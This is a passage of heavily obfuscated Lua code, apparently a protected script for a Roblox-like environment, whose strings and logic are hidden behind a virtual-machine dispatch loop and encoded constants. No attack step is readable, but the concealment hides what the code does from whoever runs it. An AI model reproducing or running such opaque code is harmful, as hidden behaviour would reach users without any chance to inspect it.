E=S(u)S=p[j[541025-541017]]E=N(-410825-(-423869))v=N(-264862-(-278005))E=S[E]z=nil E=E(S)E=N(-349054-(-362105))S=M[E]B=p[j[968178+-968176]]Q=nil i=p[j[914895-914892]]A=i(v,c)u=B[A]E=S(u)S=E()E={}S=M[N(837512+-824355)]end else if S<8751550-(-623256)then v=v+c k=not W i=v<=A i=k and i k=v>=A k=W and k i=k or i k=-690299+11567798 S=i and k i=339410+15245670 S=S or i else r=p[j[-175403+175409]]S=12893094-286428 z=r==Q E=z end end end else if S<11121191-(-145738)then if S<-777655+11506721 then if S<10383770-(-61891)then if S<11106663-812637 then r=r+h B=not u z=r<=F z=B and z B=r>=F B=u and B z=B or z B=-796930+6196288 S=z and B z=-697810+8068344 S=S or z else u=27617393213824-347972 S=p[j[-1017552+1017556]]B=-512416+29302369322732 h=N(-36650-(-49770))z=p[j[927348-927346]]r=p[j[797854-797851]]F=r(h,u)u=N(101941-88753)E=z[F]r=p[j[774239+-774237]]F=p[j[-296779+296782]]h=F(u,B)z=r[h]S[E]=z E=N(-696421+709544)S=M[E]r=x(1890760-(-221791),{j[133428-133423];j[-505005+505011]})F={S(r)}E=F[805459-805458]r=E z=F[308442-308440]S=not r S=S and-390221-(-522474)or-240814+6366765 end else E=N(-701441-(-714487))A=x(2908981-126987,{})i=N(672121-658998)S=M[E]Q=p[j[-1040147-(-1040151)]]F=N(944559-931510)r=M[F]B=M[i]i={B(A)}u={H(i)}B=107082-107080 h=u[B]F=r(h)r=N(319080-306006)z=Q(F,r)Q={z()}E=S(H(Q))z=p[j[-367591-(-367596)]]Q=E E=z S=z and 8865483-(-893236)or 1044849+11561817 end else if S<10366086-(-835179)then if S<-553686+11598834 then i=v P=N(555666+-542548)U=M[P]P=N(672861+-659801)t=U[P]U=t(Q,i)t=p[j[910684-910678]]P=t()i=nil Y=U+P w=Y+u Y=-53195-(-53451)k=w%Y S=-69302+9182073 u=k P=-791640-(-791641)Y=r[z]U=u+P t=F[U]w=Y..t r[z]=w else S=7306934-379129 w=Y b=w k[w]=b w=nil end else S=p[j[538728+-538727]]Q=L[-811114+811115]z=L[-997085-(-997087)]r=S S=r[z]S=S and 1950315-582395 or 13395806-(-707805)end end else if S<909064+10532689 then if  S<584523+10738399 then if S<12217428-901407 then l=n()p[l]=t O=N(-475636+488796)E=M[O]O=N(-284134+297330)V=289872-289870 b=-714000-(-714100)S=E[O]O=503730-503729 E=S(O,b)q=315783+-315528 O=n()p[O]=E S=p[B]b=-139478-(-139478)E=S(b,q)b=n()d=33756-33755 q=732514-732513 e=N(263840-250791)y=-1005602+1015602 p[b]=E T=765607-765607 S=p[B]a=p[O]E=S(q,a)q=n()p[q]=E E=p[B]a=E(d,V)E=-956802-(-956803)S=a==E a=n()V=N(288559+-275494)p[a]=S E=N(971170-958096)S=N(-927783-(-940938))m=M[e]I=p[B]C={I(T,y)}e=m(H(C))m=N(-99225-(-112290))G=e..m S=w[S]d=V..G V=N(160673+-147550)S=S(w,E,d)d=n()p[d]=S G=s(-333625+4456745,{B;l,v,r,z,Y;a;d,O;q;b,A})E=M[V]V={E(G)}S={H(V)}V=S S=p[a]S=S and 6171434-(-180830)or 719014+10602614 else m=p[z]G=m S=m and 834361+8033707 or 5760716-999849 end else Q=L S=true z=n()B=N(975354-962231)h=n()i=f(7032144-144099,{h})F=n()p[z]=S r=N(-832160+845278)E=M[r]r=N(270718+-257547)S=E[r]r=n()p[r]=S S=D(11792452-176891,{})p[F]=S S=false p[h]=S u=M[B]B=u(i)E=B S=B and 15861+5630098 or-777288+2671687 end else if S<11149181-(-459129)then d=X(d)b=X(b)V=nil l=X(l)q=X(q)O=X(O)S=-462473+15863057 a=X(a)else Q=N(-196503+209604)E=N(326792-313589)S=M[E]E=S(Q)S=M[N(-880976-(-894061))]E={}end end end end else if S<948045+13556545 then if S<276950+12594298 then if S<13427388-1043397 then if S<-231760+12396589 then if S<10909081-(-997891)then E=p[j[147554-147553]]z=p[j[-638686-(-638688)]]r=p[j[848160+-848157]]u=7325218734423-586756 h=N(-229168+242197)F=r(h,u)Q=z[F]S=E[Q]Q=S h=N(810924-797841)z=p[j[-993615+993617]]r=p[j[-364028+364031]]u=31240001826665-(-903530)F=r(h,u)E=z[F]S=Q==E S=S and 7225316-9802 or-524265+10918219 else v=N(541883+-528705)A=M[v]E=A S=-48250+15294680 end else z=p[j[-40324-(-40327)]]r=682639-682638 Q=z~=r S=Q and-629223+7598173 or 689372+14725369 end else if S<905100+11665616 then if S<-133026+12651480 then S=p[j[-504848+504852]]h=p[j[-885000+885002]]i=N(-68556+81598)W=N(-650851+663898)k=491091+543397069482 A=29933550609290-(-938728)u=p[j[-406387+406390]]B=u(i,A)v=N(-463099-(-476203))E=h[B]B=p[j[-821404+821406]]c=13039885322590-405926 i=p[j[-749612-(-749615)]]A=i(v,c)u=B[A]A=p[j[500529+-500527]]v=p[j[-801923+801926]]c=v(W,k)i=A[c]B=F[i]h=u..B S[E]=h S=M[N(831005+-817831)]E={}else S={}r=p[j[134642-134633]]z=206767+-206766 F=r Q=S r=580599+-580598 S=174678+10078276 h=r r=208624-208624 u=h<r r=z-h end else S=-361295+16303271 p[j[220556-220551]]=E Q=nil end end else if S<13362883-(-782142)then if S<768657+13160575 then if S<-903230+14219720 then S=4809053-(-667632)else S=14954990-737830 K=-265329-(-265329)Y=#k w=Y==K end else S={}i=N(728680-715562)p[j[418060+-418058]]=S B=680633+-680378 h=56324+35184372032508 S=-414089+9526860 E=p[j[-106116-(-106119)]]F=E E=z%h p[j[-463210+463214]]=E v=1037742-1037741 u=z%B B=466028+-466026 c=v h=u+B p[j[-682059+682064]]=h B=M[i]i=N(-339078-(-352219))u=B[i]v=814867-814867 B=u(Q)u=N(355412-342329)r[z]=u u=-44640-(-44811)W=c<v i=888080-888079 A=B v=i-c end else if S<14342126-(-2461)then Y=716451+-716450 K=#k w=r(Y,K)S=-615930+3537337 Y=u(k,w)b=986210+-986209 K=p[W]O=Y-b w=nil l=B(O)K[Y]=l Y=nil else K=N(-451207-(-464230))S=M[K]K=N(-461902-(-475013))M[K]=S S=121245+7049178 end end end else if S<-274085+15522544 then if S<536021+14502195 then if S<658347+14309179 then if S<721501+14047220 then S=M[N(782012-768792)]E={z}else S=1364341-825783 end else E=12547202-812226 z=N(465244-452217)r=5812835-(-743891)Q=z^r S=E-Q E=N(-285173-(-298246))Q=S S=E/Q E={S}S=M[N(792284+-779266)]end else if S<15230040-120605 then Y=n()V=N(-1021605-(-1034620))k=nil O=N(-9048+22265)w={}k=-584315+17469537028673 p[Y]=w l=n()w=n()K=x(909260+1993293,{Y,A,v;h})e=nil B=nil p[w]=K c=nil b={}c=12517844276173-(-131832)i=nil K={}p[l]=K K=M[O]a=N(-898120-(-911286))h=X(h)u=nil d=p[l]q={[a]=d,[V]=e}r=nil O=K(b,q)h=N(977500+-964381)p[F]=O K=D(12251704-1034373,{l;Y,W,A,v;w})W=X(W)p[z]=K Y=X(Y)w=X(w)d=28787253873838-137297 r=M[h]l=X(l)B=p[F]A=X(A)i=p[z]v=X(v)W=N(714017-700865)v=N(-264388-(-277513))h=N(108979-95907)A=i(v,c)h=r[h]u=B[A]B=N(-393192-(-406311))h=h(r,u)w=25248716778129-146596 r=n()p[r]=h u=M[B]A=p[F]v=p[z]B=N(-920643+933715)c=v(W,k)B=u[B]i=A[c]B=B(u,i)c=N(-302499-(-315540))Y=12024779920811-(-327732)i=p[F]k=N(414102-400929)A=p[z]W=-895407+1547053558911 v=A(c,W)c=16782585943208-(-477663)u=i[v]h=B[u]u=n()b=931534+3300559064882 v=N(146916-133830)p[u]=h K=N(206584-193525)B=p[F]i=p[z]A=i(v,c)h=B[A]A=N(-216360+229424)B=n()p[B]=h i=M[A]v=p[F]c=p[z]W=c(k,w)A=v[W]h=i[A]w=849063+23519027656224 a=-69733+27281328374276 q=9178312214736-(-362465)v=p[F]k=N(453681+-440653)l=32944523255200-(-433740)c=p[z]W=c(k,w)k=N(522059-508884)A=v[W]i=h(A)h=n()p[h]=i w=400825+6452148284931 i=p[h]v=p[F]c=p[z]W=c(k,w)A=v[W]c=p[F]W=p[z]w=N(312841+-299731)k=W(w,Y)v=c[k]i[A]=v i=p[h]v=p[F]w=-788892+23445028877377 k=N(979785+-966654)c=p[z]W=c(k,w)A=v[W]v=true i[A]=v w=33696564539801-(-969650)i=p[h]v=p[F]k=N(-830427+843618)c=p[z]W=c(k,w)A=v[W]v=false w=-36273+2743568454318 i[A]=v i=p[h]k=N(-542450+555572)v=p[F]c=p[z]W=c(k,w)A=v[W]c=N(810831+-797712)v=M[c]k=p[F]c=N(901479+-888407)w=p[z]Y=w(K,l)w=N(-455843-(-469064))c=v[c]W=k[Y]c=c(v,W)v=N(117814+-104750)i[A]=c A=M[v]c=p[F]W=p[z]Y=13138673363097-(-257869)k=W(w,Y)v=c[k]i=A[v]w=N(135473-122343)Y=4470473910961-598672 c=p[F]W=p[z]k=W(w,Y)v=c[k]A=i(v)w=-495183+28906618143459 k=N(-677306+690362)v=p[F]c=p[z]W=c(k,w)l=978661+33274843336097 K=N(748327+-735141)i=v[W]W=N(-116432+129638)c=M[W]k=p[F]w=p[z]Y=w(K,l)W=k[Y]v=c[W]k=-354867+355187 Y=-994304+994494 W=178120-178120 l=260308+8456022513293 w=-862393-(-862393)I=-611742+30829428477362 c=v(W,k,w,Y)A[i]=c k=N(-698957+712012)w=8677167245807-137767 v=p[F]c=p[z]W=c(k,w)i=v[W]W=N(847779-834573)c=M[W]k=p[F]K=N(-40377-(-53554))w=p[z]Y=w(K,l)W=k[Y]v=c[W]k=-909483+909323 W=1035688.5-1035688 Y=608047+-608142 w=808617+-808616.5 c=v(W,k,w,Y)A[i]=c v=p[F]w=889208+24549455731503 c=p[z]l=11296293235122-169254 k=N(209709+-196567)W=c(k,w)K=N(-581067+594119)i=v[W]W=N(-639285+652355)c=M[W]k=p[F]w=p[z]Y=w(K,l)w=-441492-(-441532)W=k[Y]k=903754+-903714 v=c[W]W=-232396-(-232436)c=v(W,k,w)A[i]=c v=p[F]w=27716778394434-708824 c=p[z]k=N(103632-90471)W=c(k,w)w=21916784295416-874011 k=N(393821+-380729)i=v[W]v=-606628-(-606628)A[i]=v v=p[F]c=p[z]W=c(k,w)c=N(-697580-(-710644))i=v[W]K=-602513+18781552006074 v=p[h]A[i]=v v=M[c]W=p[F]k=p[z]Y=N(-1020512+1033649)w=k(Y,K)Y=N(873325-860289)l=N(-542624-(-555721))c=W[w]i=v[c]K=1227900633782-(-900997)W=p[F]k=p[z]w=k(Y,K)c=W[w]v=i(c,A)w=N(199422-186250)c=p[F]Y=20631533297563-752148 W=p[z]k=W(w,Y)i=c[k]k=N(-723909+736944)W=M[k]w=p[F]Y=p[z]K=Y(l,b)k=w[K]w=160028+-160018 Y=N(382476-369262)c=W[k]k=441526+-441526 W=c(k,w)v[i]=W c=N(425736+-412672)v=M[c]K=8032862743169-(-402459)W=p[F]k=p[z]w=k(Y,K)c=W[w]i=v[c]W=p[F]k=p[z]l=N(609580-596459)Y=N(-928973+942152)K=-161091+9174009595378 w=k(Y,K)c=W[w]b=475187+32696787008326 v=i(c,A)c=p[F]Y=447287+15062253389870 w=N(1313+11886)W=p[z]k=W(w,Y)i=c[k]c=-765721+765722.5 w=N(-509593-(-522737))Y=3433867706700-(-1267)v[i]=c c=p[F]W=p[z]k=W(w,Y)i=c[k]k=N(-860082+873152)W=M[k]w=p[F]Y=p[z]K=Y(l,b)k=w[K]K=N(747696-734617)c=W[k]w=-971872-(-971972)Y=-975437-(-975692)k=668214+-668114 W=c(k,w,Y)v[i]=W l=27580099110919-865757 W=N(-855278+868342)c=M[W]k=p[F]w=p[z]Y=w(K,l)l=-714545+20903404866870 W=k[Y]i=c[W]K=N(-847244-(-860283))k=p[F]w=p[z]Y=w(K,l)W=k[Y]Y=N(-923873+936963)c=i(W,A)K=34243839177070-(-986332)W=p[F]k=p[z]w=k(Y,K)b=N(-139065-(-152102))i=W[w]w=N(806565+-793359)k=M[w]Y=p[F]K=p[z]l=K(b,q)w=Y[l]l=-810335-(-810375)q=22578497042893-479420 W=k[w]K=466162-466162 Y=820143-820183 w=409734+-409733 k=W(w,Y,K,l)b=N(-802987-(-816027))K=10967748049182-(-629461)Y=N(260151-246989)c[i]=k W=p[F]k=p[z]w=k(Y,K)i=W[w]w=N(-134589+147795)k=M[w]Y=p[F]K=p[z]l=K(b,q)w=Y[l]W=k[w]Y=890475-890465 w=-137106+137106 l=-101002-(-101002)K=107108-107108 k=W(w,Y,K,l)Y=N(-468696-(-481796))c[i]=k W=p[F]k=p[z]K=15630461461641-198683 w=k(Y,K)i=W[w]b=N(-225566-(-238586))W=-722290+722291 l=10839151905116-(-641627)c[i]=W W=p[F]q=25736096723780-(-621452)Y=N(-494257+507468)k=p[z]K=-891690+22992529818876 w=k(Y,K)i=W[w]k=p[F]w=p[z]K=N(563814+-550719)Y=w(K,l)W=k[Y]c[i]=W W=p[F]k=p[z]Y=N(389995-376815)K=-855818+14142655539395 w=k(Y,K)i=W[w]e=30587192014131-834960 w=N(148471-135401)k=M[w]Y=p[F]K=p[z]l=K(b,q)w=Y[l]q=N(120853-107695)W=k[w]w=-518201-(-518202)Y=837722+-837721 K=211792+-211791 k=W(w,Y,K)c[i]=k Y=N(12877+204)K=-18968+8599304149436 W=p[F]k=p[z]w=k(Y,K)Y=N(-751001+764194)i=W[w]w=M[Y]K=p[F]l=p[z]b=l(q,a)Y=K[b]k=w[Y]q=30206570517228-(-156678)Y=p[F]K=p[z]b=N(1026139-1013032)l=K(b,q)K=373+2321549673156 w=Y[l]W=k[w]c[i]=W q=N(-14606+27663)W=p[F]a=374451+3699365302279 k=p[z]Y=N(-46777-(-59822))w=k(Y,K)K=-754136+25371801268222 i=W[w]W=161782+-161760 c[i]=W W=p[F]Y=N(75652-62564)k=p[z]w=k(Y,K)Y=N(26101+-12908)i=W[w]w=M[Y]K=p[F]l=p[z]b=l(q,a)Y=K[b]k=w[Y]b=N(-700277-(-713433))Y=p[F]K=p[z]q=461478+10777571985652 l=K(b,q)a=1469295752767-(-609389)w=Y[l]W=k[w]b=14736884060023-(-985943)k=N(-14909+27973)q=N(621502-608338)c[i]=W W=M[k]l=N(-305954-(-319025))w=p[F]Y=p[z]K=Y(l,b)k=w[K]i=W[k]w=p[F]l=N(458040-445018)b=14995657738700-(-1003898)Y=p[z]K=Y(l,b)k=w[K]W=i(k,A)l=3309977857601-(-169924)k=p[F]w=p[z]K=N(-354499-(-367623))Y=w(K,l)i=k[Y]Y=N(863425+-850219)w=M[Y]K=p[F]l=p[z]b=l(q,a)Y=K[b]b=-327539-(-327579)K=290920-290880 k=w[Y]Y=634808-634808 l=-619058+619058 w=k(Y,K,l,b)K=N(629659-616584)W[i]=w k=p[F]l=33777211117171-971011 w=p[z]a=4537879111121-(-451184)Y=w(K,l)i=k[Y]Y=N(173887+-160681)w=M[Y]q=N(-241369+254471)K=p[F]l=p[z]b=l(q,a)Y=K[b]k=w[Y]v=nil K=-1027222+1027182 b=365608-365608 l=68480+-68480 Y=-981814-(-981815)w=k(Y,K,l,b)W[i]=w l=811492+22100828112463 k=p[F]K=N(268840-255714)w=p[z]Y=w(K,l)i=k[Y]k=-838203+838204 W[i]=k l=1893397854229-(-183132)q=N(-673227-(-686332))k=p[F]K=N(628112+-614917)b=335644+12570742388673 w=p[z]Y=w(K,l)a=978392+16955650912511 i=k[Y]l=N(-276394+289545)S=M[N(735045+-721844)]w=p[F]Y=p[z]K=Y(l,b)k=w[K]W[i]=k k=p[F]l=-350914+31274838709157 w=p[z]K=N(807258+-794118)Y=w(K,l)i=k[Y]Y=N(-571609-(-584679))w=M[Y]K=p[F]l=p[z]b=l(q,a)Y=K[b]k=w[Y]Y=-47659-(-47914)K=-385499-(-385579)l=994998-994918 w=k(Y,K,l)l=16004610864844-432560 W[i]=w k=p[F]w=p[z]K=N(-313982-(-327164))c=nil Y=w(K,l)i=k[Y]a=N(1017882-1004755)K=N(-888895-(-902088))Y=M[K]l=p[F]b=p[z]q=b(a,d)K=l[q]w=Y[K]K=p[F]l=p[z]a=-869523+9351378900373 q=N(-187265+200341)b=l(q,a)Y=K[b]d=N(426284-413254)k=w[Y]W[i]=k k=p[F]w=p[z]a=175778+15240846093591 l=317759+1723642161635 K=N(-813186-(-826345))Y=w(K,l)i=k[Y]k=-524244-(-524268)w=N(192241+-179177)W[i]=k q=27846720912387-(-882340)k=M[w]Y=p[F]K=p[z]b=N(-264780-(-277886))l=K(b,q)b=N(702569-689454)V=588934+499547391074 w=Y[l]i=k[w]Y=p[F]q=18529690809968-201916 K=p[z]l=K(b,q)w=Y[l]k=i(w,A)q=12691391967136-809099 i=n()p[i]=k b=N(7004-(-6130))k=p[i]Y=p[F]K=p[z]l=K(b,q)w=Y[l]K=p[F]l=p[z]q=N(-589554-(-602670))b=l(q,a)Y=K[b]k[w]=Y b=N(-1033804-(-1047022))k=p[i]Y=p[F]q=-519695+34160152407090 K=p[z]l=K(b,q)w=Y[l]l=N(739843+-726637)K=M[l]b=p[F]q=p[z]a=q(d,V)V=48492+13118434417264 l=b[a]b=-959595+959555 a=-1025817-(-1025852)Y=K[l]d=N(497327-484247)q=-61777-(-61777)l=-218475-(-218476)K=Y(l,b,q,a)k[w]=K k=p[i]b=N(-428637-(-441654))Y=p[F]K=p[z]q=-759336+26079999575448 l=K(b,q)w=Y[l]l=N(-609479-(-622685))K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]a=857106-857046 b=-681761+681781 Y=K[l]l=-653439-(-653439)q=232124+-232124 K=Y(l,b,q,a)V=34679302292595-(-670369)k[w]=K k=p[i]q=93604+26235645231636 b=N(932360-919150)Y=p[F]K=p[z]l=K(b,q)w=Y[l]d=N(16904-3776)l=N(97876+-84806)K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]Y=K[l]V=21257842933359-(-960571)q=-36505-(-36565)l=-274796+274856 b=-363632-(-363692)K=Y(l,b,q)q=163258+5215390501826 b=N(465653-452505)k[w]=K k=p[i]Y=p[F]K=p[z]l=K(b,q)w=Y[l]l=N(-251289-(-264359))K=M[l]b=p[F]q=p[z]d=N(-510314-(-523372))a=q(d,V)l=b[a]Y=K[l]q=-368292-(-368293)b=466746-466745 V=N(602798+-589767)l=458165-458164 K=Y(l,b,q)q=1816479897803-(-633474)k[w]=K b=N(-840468+853655)k=p[i]Y=p[F]K=p[z]l=K(b,q)w=Y[l]b=N(-944280-(-957473))l=M[b]q=p[F]a=p[z]d=a(V,e)b=q[d]K=l[b]b=p[F]V=24957209163378-(-407283)d=N(-857194-(-870413))q=p[z]a=q(d,V)V=-1014964+20441911615971 q=-592126+12594053586918 l=b[a]Y=K[l]k[w]=Y k=p[i]b=N(718596-705533)Y=p[F]K=p[z]l=K(b,q)w=Y[l]Y=-218473-(-218493)k[w]=Y k=p[i]Y=p[F]K=p[z]b=N(94471-81423)q=10139704277439-157518 l=K(b,q)w=Y[l]d=N(-958158-(-971254))K=p[F]q=N(525551-512468)l=p[z]E={}a=-512508+4768496720552 b=l(q,a)Y=K[b]k[w]=Y q=N(645666-632598)Y=N(394950+-381886)w=M[Y]K=p[F]l=p[z]a=15904031445805-423488 b=l(q,a)a=-162844+11609000661305 Y=K[b]k=w[Y]q=N(-635465-(-648672))K=p[F]l=p[z]b=l(q,a)Y=K[b]K=p[i]b=N(-1013948+1026986)w=k(Y,K)Y=p[F]q=3361334896705-647716 K=p[z]l=K(b,q)k=Y[l]l=N(677441-664406)K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]Y=K[l]b=-953256-(-953262)l=427583-427583 d=N(-573345+586477)K=Y(l,b)q=N(-504867-(-518076))Y=N(-658808+671872)w[k]=K w=M[Y]K=p[F]l=p[z]a=297339+33709829125078 b=l(q,a)q=N(-80882+94066)Y=K[b]V=140576+29800295534868 k=w[Y]a=417855+5254731884879 K=p[F]l=p[z]b=l(q,a)Y=K[b]w=k(Y,A)b=N(-771223+784249)Y=p[F]K=p[z]q=33012654126152-800828 l=K(b,q)k=Y[l]l=N(-939991+953197)K=M[l]b=p[F]q=p[z]a=q(d,V)d=N(-88765-(-101941))V=13832891448923-(-203470)l=b[a]q=827127-827127 a=287849-287814 Y=K[l]l=-1047617+1047618 b=798514+-798554 K=Y(l,b,q,a)w[k]=K Y=p[F]K=p[z]b=N(630336-617190)q=22210383442053-(-751585)e=13882859497745-(-1028143)l=K(b,q)k=Y[l]l=N(-944146+957352)K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]Y=K[l]q=64003+-64003 l=-195218-(-195218)a=1047214-1047104 b=824648-824628 K=Y(l,b,q,a)d=N(675132-661963)q=-272438+23403177579207 w[k]=K Y=p[F]K=p[z]a=31561761479254-(-745235)b=N(801103-788053)l=K(b,q)V=16065526474338-(-538327)k=Y[l]q=N(-637212+650414)K=p[F]l=p[z]b=l(q,a)Y=K[b]w[k]=Y Y=p[F]q=15556533679286-(-452502)b=N(1016482+-1003278)K=p[z]l=K(b,q)k=Y[l]l=N(592595-579525)K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]Y=K[l]l=992327-992247 q=-242713+242968 b=237237+-237117 K=Y(l,b,q)V=-581399+28247925871224 q=-749683+14907081493392 w[k]=K b=N(-1012953+1026142)Y=p[F]K=p[z]l=K(b,q)k=Y[l]l=N(540159-527089)d=N(-94667+107721)K=M[l]b=p[F]q=p[z]a=q(d,V)l=b[a]Y=K[l]q=106131+-106130 b=-930280-(-930281)l=704714+-704713 K=Y(l,b,q)q=-576368+31306373858402 w[k]=K b=N(330107-317041)Y=p[F]K=p[z]l=K(b,q)k=Y[l]b=N(351121+-337928)l=M[b]q=p[F]a=p[z]V=N(414123+-400987)d=a(V,e)b=q[d]d=N(-757070-(-770268))V=28747473362204-92370 K=l[b]b=p[F]q=p[z]a=q(d,V)q=507346+22201999485584 l=b[a]d=898271+27001294093374 Y=K[l]e=699333+32216684957397 w[k]=Y a=N(-479407+492599)Y=p[F]b=N(876633-863433)K=p[z]l=K(b,q)k=Y[l]Y=-170897-(-170917)w[k]=Y K=N(-31033+44097)Y=M[K]V=N(843936+-830874)l=p[F]b=p[z]q=b(a,d)d=-503811+19798746993670 K=l[q]k=Y[K]l=p[F]b=p[z]a=N(434719+-421650)q=b(a,d)K=l[q]Y=k(K,w)q=N(531119+-518025)K=p[F]l=p[z]a=135350+21696930715329 b=l(q,a)k=K[b]b=N(987330+-974295)l=M[b]q=p[F]a=p[z]d=a(V,e)b=q[d]q=-352943+352949 K=l[b]b=220903-220903 l=K(b,q)K=N(-976230+989294)a=N(211086+-197874)d=5872219182339-887381 e=N(-960447-(-973480))Y[k]=l Y=M[K]l=p[F]b=p[z]q=b(a,d)K=l[q]k=Y[K]a=N(768293+-755250)l=p[F]b=p[z]d=-963543+23513412361884 q=b(a,d)K=l[q]Y=k(K,A)k=n()p[k]=Y Y=p[k]d=27619504621649-(-109036)l=p[F]a=N(1006806+-993601)b=p[z]q=b(a,d)K=l[q]q=N(-960443-(-973649))b=M[q]a=p[F]d=p[z]V=d(e,I)q=a[V]a=-817871+817871 l=b[q]V=366829-366804 q=51311+-51310 d=-763654+763654 b=l(q,a,d,V)Y[K]=b Y=p[k]a=N(519250+-506065)d=839868+923091448049 l=p[F]e=N(-624406-(-637539))b=p[z]I=728139+2574836033636 q=b(a,d)K=l[q]q=N(454879-441673)b=M[q]a=p[F]d=p[z]V=d(e,I)e=N(236937-223828)q=a[V]V=1008657-1008682 l=b[q]a=-624864-(-624864)q=926646+-926646 d=39057+-39056 b=l(q,a,d,V)Y[K]=b d=413551898805-(-86027)a=N(-922798+935910)Y=p[k]l=p[F]b=p[z]q=b(a,d)a=N(-87552+100701)K=l[q]d=1014752+16827122295483 l=-981888+981889 Y[K]=l Y=p[k]l=p[F]b=p[z]q=b(a,d)K=l[q]q=N(-156288-(-169358))b=M[q]I=-501457+14183837761693 a=p[F]d=p[z]V=d(e,I)q=a[V]V=12709295171524-594086 l=b[q]a=591994-591993 d=-909526+909527 q=-1032039-(-1032040)b=l(q,a,d)d=-111690+3774886345511 a=N(387495+-374332)Y[K]=b Y=p[k]l=p[F]b=p[z]q=b(a,d)K=l[q]l=-126761-(-126779)Y[K]=l d=-1966+2084661807992 Y=p[k]a=N(794454-781238)l=p[F]b=p[z]q=b(a,d)d=N(-393644-(-406742))K=l[q]b=p[F]q=p[z]a=q(d,V)l=b[a]d=-839718+9029619376274 Y[K]=l l=p[F]b=p[z]a=N(397141-383933)q=b(a,d)A=nil K=l[q]l=s(7463237-(-275438),{h})a=N(158801+-145719)Y=W[K]K=N(96715-83521)K=Y[K]K=K(Y,l)l=p[F]d=-847303+35097315978654 b=p[z]q=b(a,d)K=l[q]l=o(11143669-(-684171),{i,F,z;k,r,B,u,h})z=X(z)Y=w[K]w=nil i=X(i)F=X(F)B=X(B)r=X(r)k=X(k)K=N(-731923+745117)K=Y[K]u=X(u)K=K(Y,l)h=X(h)W=nil else A=n()c=479047-478982 p[A]=E v=-223148-(-223151)S=p[B]E=S(v,c)w=s(14910662-(-61687),{})v=n()k=N(-688567+701690)S=135965+-135965 p[v]=E c=S S=979454+-979454 W=S E=M[k]k={E(w)}S={H(k)}k=S E=869947+-869945 P=N(-580757+593806)S=k[E]E=N(935090+-922044)w=S S=M[E]Y=p[r]U=M[P]P=U(w)U=N(137971+-124897)t=Y(P,U)Y={t()}E=S(H(Y))Y=n()p[Y]=E t=p[v]U=t t=-864711-(-864712)S=14545510-(-855074)E=-197547+197548 P=t t=-318482+318482 K=P<t t=E-P end end else if S<15458436-(-174830)then if S<923591+14517147 then if S<930669+14469956 then t=t+P l=not K E=t<=U E=l and E l=t>=U l=K and l E=l or E l=34583+11242999 S=E and l E=836216+-55754 S=S or E else r=-170315-(-170322)z=p[j[-713168-(-713171)]]Q=z*r z=-542391+542648 E=Q%z S=287218+11923833 p[j[-209919+209922]]=E end else u=nil S=-829060+15558929 F=nil B=nil end else if S<16094204-245535 then E={}S=M[N(-594957-(-608179))]else S=p[j[674437-674430]]S=S and-598246+4952566 or 12155373-(-399534)end end end end end end end S=#J return H(E)end,function()z=(502935+-502934)+z Q[z]=-133507-(-133508)return z end,function(M,N)local H=r(N)local L=function(L)return S(M,{L},N,H)end return L end,function(M,N)local H=r(N)local L=function(L,j)return S(M,{L;j},N,H)end return L end,function(M)local N,S=-376712-(-376713),M[-848358-(-848359)]while S do Q[S],N=Q[S]-(765114+-765113),N+(-675388+675389)if-764001-(-764001)==Q[S]then Q[S],p[S]=nil,nil end S=M[N]end end,function(M,N)local H=r(N)local L=function()return S(M,{},N,H)end return L end,{},function(M,N)local H=r(N)local L=function(...)return S(M,{...},N,H)end return L end,function(M)Q[M]=Q[M]-(734975-734974)if Q[M]==-659526-(-659526)then Q[M],p[M]=nil,nil end end,-391615-(-391615),function(M,N)local H=r(N)local L=function(L,j,J,Z,E)return S(M,{L,j;J,Z,E},N,H)end return L end,function(M,N)local H=r(N)local L=function(L,j,J)return S(M,{L;j,J},N,H)end return L end,{}return(h(-784198+12116829,{}))(H(E))end)(getfenv and getfenv()or _ENV,unpack or table[N(679921+-666743)],newproxy,setmetatable,getmetatable,select,{...})end)(...)
